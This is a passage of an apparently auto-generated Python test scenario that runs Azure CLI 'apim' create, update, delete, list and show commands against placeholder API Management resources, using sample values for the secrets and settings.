self.cmd('apim backend show --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend"', checks=[
])
self.cmd('apim backend show --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
# create_or_update -- create
self.cmd('apim cache create --resource-group "rg1" --service-name "apimService1" --cache-id "westindia" --description "Redis cache instances in West India" --connection-string "contoso5.redis.cache.windows.net,ssl=true,password=..." --resource-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Cache/Redis/{{ redis_name }}"', checks=[
])
self.cmd('apim cache create --resource-group "rg1" --service-name "apimService1" --cache-id "westindia" --description "Update Cache in west India"', checks=[
])
self.cmd('apim cache create --resource-group "rg1" --service-name "apimService1" --cache-id "southindia"', checks=[
])
# create_or_update -- update
self.cmd('apim cache update --resource-group "rg1" --service-name "apimService1" --cache-id "westindia" --description "Redis cache instances in West India" --connection-string "contoso5.redis.cache.windows.net,ssl=true,password=..." --resource-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Cache/Redis/{{ redis_name }}"', checks=[
])
self.cmd('apim cache update --resource-group "rg1" --service-name "apimService1" --cache-id "westindia" --description "Update Cache in west India"', checks=[
])
self.cmd('apim cache update --resource-group "rg1" --service-name "apimService1" --cache-id "southindia"', checks=[
])
# delete -- delete
self.cmd('apim cache delete --resource-group "rg1" --service-name "apimService1" --cache-id "westindia"', checks=[
])
self.cmd('apim cache delete --resource-group "rg1" --service-name "apimService1" --cache-id "westindia"', checks=[
])
self.cmd('apim cache delete --resource-group "rg1" --service-name "apimService1" --cache-id "southindia"', checks=[
])
# list_by_service -- list
self.cmd('apim cache list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim cache list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim cache list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim cache show --resource-group "rg1" --service-name "apimService1" --cache-id "westindia"', checks=[
])
self.cmd('apim cache show --resource-group "rg1" --service-name "apimService1" --cache-id "westindia"', checks=[
])
self.cmd('apim cache show --resource-group "rg1" --service-name "apimService1" --cache-id "southindia"', checks=[
])
# create_or_update -- create
self.cmd('apim certificate create --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert" --data "****************Base 64 Encoded Certificate *******************************" --password "****Certificate Password******"', checks=[
])
self.cmd('apim certificate create --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
# create_or_update -- update
self.cmd('apim certificate update --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert" --data "****************Base 64 Encoded Certificate *******************************" --password "****Certificate Password******"', checks=[
])
self.cmd('apim certificate update --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
# delete -- delete
self.cmd('apim certificate delete --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
self.cmd('apim certificate delete --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
# list_by_service -- list
self.cmd('apim certificate list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim certificate list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim certificate show --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
self.cmd('apim certificate show --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
# create_or_update -- create
self.cmd('apim create --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Developer" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1" --virtual-network-type "External" --publisher-email "admin@live.com" --publisher-name "contoso" --sku-name "Premium" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Consumption" --location "West US"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Basic" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1" --publisher-email "foobar@live.com" --publisher-name "Contoso Vnext"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- update
self.cmd('apim update --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Developer" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1" --virtual-network-type "External" --publisher-email "admin@live.com" --publisher-name "contoso" --sku-name "Premium" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Consumption" --location "West US"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Basic" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1" --publisher-email "foobar@live.com" --publisher-name "Contoso Vnext"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1"', checks=[
])
# delete -- delete
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
# list_by_resource_group -- list
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
# list -- list
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
# get -- show
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- create
self.cmd('apim diagnostic create --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/azuremonitor"', checks=[
])
self.cmd('apim diagnostic create --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim diagnostic create --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
# create_or_update -- update
self.cmd('apim diagnostic update --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/azuremonitor"', checks=[
])
self.cmd('apim diagnostic update --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim diagnostic update --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
# delete -- delete
self.cmd('apim diagnostic delete --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim diagnostic delete --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim diagnostic delete --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
# list_by_service -- list
self.cmd('apim diagnostic list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim diagnostic list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim diagnostic list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim diagnostic show --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim diagnostic show --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim diagnostic show --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
# create_or_update -- create
self.cmd('apim template create --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage" --subject "Your request for $IssueName was successfully received."', checks=[
])
self.cmd('apim template create --resource-group "rg1" --service-name "apimService1" --name "applicationApprovedNotificationMessage" --subject "Your application $AppName is published in the gallery" --body "<!DOCTYPE html >\r\n<html>\r\n <head />\r\n <body>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">Dear $DevFirstName $DevLastName,</p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">\r\n We are happy to let you know that your request to publish the $AppName application in the gallery has been approved. Your application has been published and can be viewed <a href=\"http://$DevPortalUrl/Applications/Details/$AppId\">here</a>.\r\n </p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">Best,</p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">The $OrganizationName API Team</p>\r\n </body>\r\n</html>"', checks=[
])
self.cmd('apim template create --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
# create_or_update -- update
self.cmd('apim template update --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage" --subject "Your request for $IssueName was successfully received."', checks=[
])
self.cmd('apim template update --resource-group "rg1" --service-name "apimService1" --name "applicationApprovedNotificationMessage" --subject "Your application $AppName is published in the gallery" --body "<!DOCTYPE html >\r\n<html>\r\n <head />\r\n <body>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">Dear $DevFirstName $DevLastName,</p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">\r\n We are happy to let you know that your request to publish the $AppName application in the gallery has been approved. Your application has been published and can be viewed <a href=\"http://$DevPortalUrl/Applications/Details/$AppId\">here</a>.\r\n </p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">Best,</p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">The $OrganizationName API Team</p>\r\n </body>\r\n</html>"', checks=[
])
self.cmd('apim template update --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
# delete -- delete
self.cmd('apim template delete --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
self.cmd('apim template delete --resource-group "rg1" --service-name "apimService1" --name "applicationApprovedNotificationMessage"', checks=[
])
self.cmd('apim template delete --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
# list_by_service -- list
self.cmd('apim template list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim template list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim template list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim template show --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
self.cmd('apim template show --resource-group "rg1" --service-name "apimService1" --name "applicationApprovedNotificationMessage"', checks=[
])
self.cmd('apim template show --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
# create_or_update -- create
self.cmd('apim group create --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --display-name "temp group"', checks=[
])
self.cmd('apim group create --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup" --display-name "NewGroup (samiraad.onmicrosoft.com)" --description "new group to test" --type "external" --external-id "aad://samiraad.onmicrosoft.com/groups/83cf2753-5831-4675-bc0e-2f8dc067c58d"', checks=[
])
self.cmd('apim group create --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --display-name "temp group"', checks=[
])
self.cmd('apim group create --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
# create_or_update -- update
self.cmd('apim group update --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --display-name "temp group"', checks=[
])
self.cmd('apim group update --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup" --display-name "NewGroup (samiraad.onmicrosoft.com)" --description "new group to test" --type "external" --external-id "aad://samiraad.onmicrosoft.com/groups/83cf2753-5831-4675-bc0e-2f8dc067c58d"', checks=[
])
self.cmd('apim group update --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --display-name "temp group"', checks=[
])
self.cmd('apim group update --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
# delete -- delete
self.cmd('apim group delete --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group delete --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
self.cmd('apim group delete --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group delete --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
# list_by_service -- list
self.cmd('apim group list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim group list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim group list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim group list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim group show --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group show --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
self.cmd('apim group show --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group show --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
# create -- create
self.cmd('apim group user create --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --user-id "59307d350af58404d8a26300"', checks=[
])
self.cmd('apim group user create --resource-group "rg1" --service-name "apimService1" --group-id "templategroup" --user-id "59307d350af58404d8a26300"', checks=[
])
# delete -- delete
self.cmd('apim group user delete --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --user-id "59307d350af58404d8a26300"', checks=[
])
self.cmd('apim group user delete --resource-group "rg1" --service-name "apimService1" --group-id "templategroup" --user-id "59307d350af58404d8a26300"', checks=[
])
# list -- list
self.cmd('apim group user list --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group user list --resource-group "rg1" --service-name "apimService1" --group-id "templategroup"', checks=[
])
# create_or_update -- create
self.cmd('apim identity-provider create --resource-group "rg1" --service-name "apimService1" --name "facebook" --client-id "facebookid" --client-secret "facebookapplicationsecret"', checks=[
])
self.cmd('apim identity-provider create --resource-group "rg1" --service-name "apimService1" --name "facebook" --client-id "updatedfacebookid" --client-secret "updatedfacebooksecret"', checks=[
])
self.cmd('apim identity-provider create --resource-group "rg1" --service-name "apimService1" --name "aad"', checks=[
])
# create_or_update -- update
self.cmd('apim identity-provider update --resource-group "rg1" --service-name "apimService1" --name "facebook" --client-id "facebookid" --client-secret "facebookapplicationsecret"', checks=[
])
self.cmd('apim identity-provider update --resource-group "rg1" --service-name "apimService1" --name "facebook" --client-id "updatedfacebookid" --client-secret "updatedfacebooksecret"', checks=[
])
self.cmd('apim identity-provider update --resource-group "rg1" --service-name "apimService1" --name "aad"', checks=[
])
# delete -- delete
self.cmd('apim identity-provider delete --resource-group "rg1" --service-name "apimService1" --name "facebook"', checks=[
])
self.cmd('apim identity-provider delete --resource-group "rg1" --service-name "apimService1" --name "facebook"', checks=[
])
self.cmd('apim identity-provider delete --resource-group "rg1" --service-name "apimService1" --name "aad"', checks=[
])
# list_by_service -- list
self.cmd('apim identity-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim identity-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim identity-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim identity-provider show --resource-group "rg1" --service-name "apimService1" --name "facebook"', checks=[
])
self.cmd('apim identity-provider show --resource-group "rg1" --service-name "apimService1" --name "facebook"', checks=[
])
self.cmd('apim identity-provider show --resource-group "rg1" --service-name "apimService1" --name "aad"', checks=[
])
# create_or_update -- create
self.cmd('apim logger create --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId" --logger-type "azureEventHub" --description "adding a new logger"', checks=[
])
self.cmd('apim logger create --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId" --logger-type "applicationInsights" --description "adding a new logger"', checks=[
])
self.cmd('apim logger create --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger create --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
# create_or_update -- update
self.cmd('apim logger update --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId" --logger-type "azureEventHub" --description "adding a new logger"', checks=[
])
self.cmd('apim logger update --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId" --logger-type "applicationInsights" --description "adding a new logger"', checks=[
])
self.cmd('apim logger update --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger update --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
# delete -- delete
self.cmd('apim logger delete --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger delete --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger delete --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger delete --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
# list_by_service -- list
self.cmd('apim logger list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim logger list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim logger list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim logger list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim logger show --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger show --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger show --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger show --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
# create_or_update -- create
self.cmd('apim notification create --resource-group "rg1" --service-name "apimService1" --name "RequestPublisherNotificationMessage"', checks=[
])
# create_or_update -- update
self.cmd('apim notification update --resource-group "rg1" --service-name "apimService1" --name "RequestPublisherNotificationMessage"', checks=[
])
# list_by_service -- list
self.cmd('apim notification list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim notification show --resource-group "rg1" --service-name "apimService1" --name "RequestPublisherNotificationMessage"', checks=[
])
# create_or_update -- create
self.cmd('apim notification recipient-user create --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
self.cmd('apim notification recipient-user create --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
# create_or_update -- update
self.cmd('apim notification recipient-user update --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
self.cmd('apim notification recipient-user update --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
# delete -- delete
self.cmd('apim notification recipient-user delete --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
self.cmd('apim notification recipient-user delete --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
# list_by_notification -- list
self.cmd('apim notification recipient-user list --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage"', checks=[
])
self.cmd('apim notification recipient-user list --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage"', checks=[
])
# create_or_update -- create
self.cmd('apim notification recipient-email create --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "foobar@live.com"', checks=[
])
self.cmd('apim notification recipient-email create --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "contoso@live.com"', checks=[
])
# create_or_update -- update
self.cmd('apim notification recipient-email update --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "foobar@live.com"', checks=[
])
self.cmd('apim notification recipient-email update --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "contoso@live.com"', checks=[
])
# delete -- delete
self.cmd('apim notification recipient-email delete --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "foobar@live.com"', checks=[
])
self.cmd('apim notification recipient-email delete --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "contoso@live.com"', checks=[
])
# list_by_notification -- list
self.cmd('apim notification recipient-email list --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage"', checks=[
])
self.cmd('apim notification recipient-email list --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage"', checks=[
])
# create_or_update -- create
self.cmd('apim openid-connect-provider create --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3" --display-name "templateoidprovider3" --metadata-endpoint "https://oidprovider-template3.net" --client-id "oidprovidertemplate3"', checks=[
])
self.cmd('apim openid-connect-provider create --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect2" --client-secret "updatedsecret"', checks=[
])
self.cmd('apim openid-connect-provider create --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
# create_or_update -- update
self.cmd('apim openid-connect-provider update --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3" --display-name "templateoidprovider3" --metadata-endpoint "https://oidprovider-template3.net" --client-id "oidprovidertemplate3"', checks=[
])
self.cmd('apim openid-connect-provider update --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect2" --client-secret "updatedsecret"', checks=[
])
self.cmd('apim openid-connect-provider update --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
# delete -- delete
self.cmd('apim openid-connect-provider delete --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
self.cmd('apim openid-connect-provider delete --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect2"', checks=[
])
self.cmd('apim openid-connect-provider delete --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
# list_by_service -- list
self.cmd('apim openid-connect-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim openid-connect-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim openid-connect-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim openid-connect-provider show --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
self.cmd('apim openid-connect-provider show --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect2"', checks=[
])
self.cmd('apim openid-connect-provider show --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
# create_or_update -- create
self.cmd('apim policy create --resource-group "rg1" --service-name "apimService1" --policy-id "policy" --value "<policies>\r\n <inbound />\r\n <backend>\r\n <forward-request />\r\n </backend>\r\n <outbound />\r\n</policies>" --format "xml"', checks=[
])
self.cmd('apim policy create --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
# create_or_update -- update
self.cmd('apim policy update --resource-group "rg1" --service-name "apimService1" --policy-id "policy" --value "<policies>\r\n <inbound />\r\n <backend>\r\n <forward-request />\r\n </backend>\r\n <outbound />\r\n</policies>" --format "xml"', checks=[
])
self.cmd('apim policy update --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
# delete -- delete
self.cmd('apim policy delete --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
self.cmd('apim policy delete --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
# list_by_service -- list
self.cmd('apim policy list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim policy list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim policy show --resource-group "rg1" --service-name "apimService1" --policy-id "policy" --format "xml"', checks=[
])
self.cmd('apim policy show --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
# create_or_update -- create
self.cmd('apim portalsetting signin create --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
self.cmd('apim portalsetting signin create --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
# create_or_update -- update
self.cmd('apim portalsetting signin update --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
self.cmd('apim portalsetting signin update --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
# get -- show
self.cmd('apim portalsetting signin show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim portalsetting signin show --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- create
self.cmd('apim portalsetting signup create --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
self.cmd('apim portalsetting signup create --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
# create_or_update -- update
self.cmd('apim portalsetting signup update --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
self.cmd('apim portalsetting signup update --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
# get -- show
self.cmd('apim portalsetting signup show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim portalsetting signup show --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- create
self.cmd('apim portalsetting delegation create --resource-group "rg1" --name "apimService1" --url "http://contoso.com/delegation" --validation-key "nVF7aKIvr9mV/RM5lOD0sYoi8ThXTRHQP7o66hvUmjCDkPKR3qxPu/otJcNciz2aQdqPuzJH3ECG4TU2yZjQ7Q=="', checks=[
])
self.cmd('apim portalsetting delegation create --resource-group "rg1" --name "apimService1" --url "http://contoso.com/delegation" --validation-key "nVF7aKIvr9mV/RM5lOD0sYoi8ThXTRHQP7o66hvUmjCDkPKR3qxPu/otJcNciz2aQdqPuzJH3ECG4TU2yZjQ7Q=="', checks=[
])
# create_or_update -- update
self.cmd('apim portalsetting delegation update --resource-group "rg1" --name "apimService1" --url "http://contoso.com/delegation" --validation-key "nVF7aKIvr9mV/RM5lOD0sYoi8ThXTRHQP7o66hvUmjCDkPKR3qxPu/otJcNciz2aQdqPuzJH3ECG4TU2yZjQ7Q=="', checks=[
])
self.cmd('apim portalsetting delegation update --resource-group "rg1" --name "apimService1" --url "http://contoso.com/delegation" --validation-key "nVF7aKIvr9mV/RM5lOD0sYoi8ThXTRHQP7o66hvUmjCDkPKR3qxPu/otJcNciz2aQdqPuzJH3ECG4TU2yZjQ7Q=="', checks=[
])
# get -- show
self.cmd('apim portalsetting delegation show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim portalsetting delegation show --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- create
self.cmd('apim product create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --display-name "Test Template ProductName 4"', checks=[
])
self.cmd('apim product create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --display-name "Test Template ProductName 4"', checks=[
])
self.cmd('apim product create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# create_or_update -- update
self.cmd('apim product update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --display-name "Test Template ProductName 4"', checks=[
])
self.cmd('apim product update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --display-name "Test Template ProductName 4"', checks=[
])
self.cmd('apim product update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# delete -- delete
self.cmd('apim product delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# list_by_tags -- list
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_service -- list
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
